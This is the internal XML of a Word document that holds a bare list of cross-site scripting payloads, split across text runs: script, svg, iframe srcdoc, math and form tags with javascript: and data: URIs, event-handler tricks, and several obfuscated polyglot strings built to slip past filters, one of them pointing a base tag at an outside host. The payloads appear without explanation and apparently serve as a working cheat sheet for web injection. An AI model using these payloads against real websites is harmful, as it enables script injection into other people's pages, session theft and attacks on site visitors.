      <w:r>
        <w:t>script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;"&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B1529" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="53878908" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&gt;&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xlink:href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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(1)"&gt;X&lt;/a&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A0C828" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="602B6E9C" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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="http://www.w3.org/2000/svg"&gt;&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data:text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript,alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)"&gt;&lt;/script&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3F4CD5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="00737261" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;form&gt;&lt;button </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>formaction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)"&gt;Click&lt;/button&gt;&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7B566" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="24F6F2CF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>`XSS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CDAB98" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5D3CA921" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;math </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>x,alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">(1)" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="http://www.w3.org/1998/Math/MathML"&gt;CLICK&lt;/math&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3138B1" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2A58D91C" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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srcdoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="&lt;/script&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DD5EC" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="355494E7" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;g onload=alert(1)&gt;&lt;/g&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1376A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="43179AA6" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oncut</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">1)" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oncopy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">1)" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onpaste</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B94B488" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="12DECAA2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;keygen autofocus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onfocus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08105AD5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="767956C5" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onblur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>autofocus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE66544" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;body onscroll=alert(1)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC787C4" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="33B04E88" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jaVasCript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/*-/*`/*\`/*'/*"/**</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/* */</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oNcliCk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert() )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>//%0D%0A%0d%0a//&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stYlE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>titLe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teXtarEa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>scRipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/--!&gt;\x3csVg/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oNloAd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)//&gt;\x3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC19991" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="572D0134" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;/script&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74940433" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6D721056" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/onload='+/"`/+/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1/+/[*/[]/+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(42);/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE99E2A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5C6592E3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;!-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1024E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="4C47AFD7" w14:textId="6A823D21" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&gt;&lt;/Title/&lt;/Style/&lt;/Script/&lt;/textArea/&lt;/iFrame/&lt;/noScript&gt;\74k&lt;K/contentEditable/autoFocus/OnFocus=/*${/*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/;{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/**/(alert)(1)}//&gt;&lt;Base/Href=//X55.is\76--&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0036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49"/>
    <w:rsid w:val="00367549"/>
    <w:rsid w:val="006C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74BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01D13ED8-DC47-440E-BAE4-C7176D38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1404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Hashem</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Adham Hashem</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-06T18:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-06T18:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>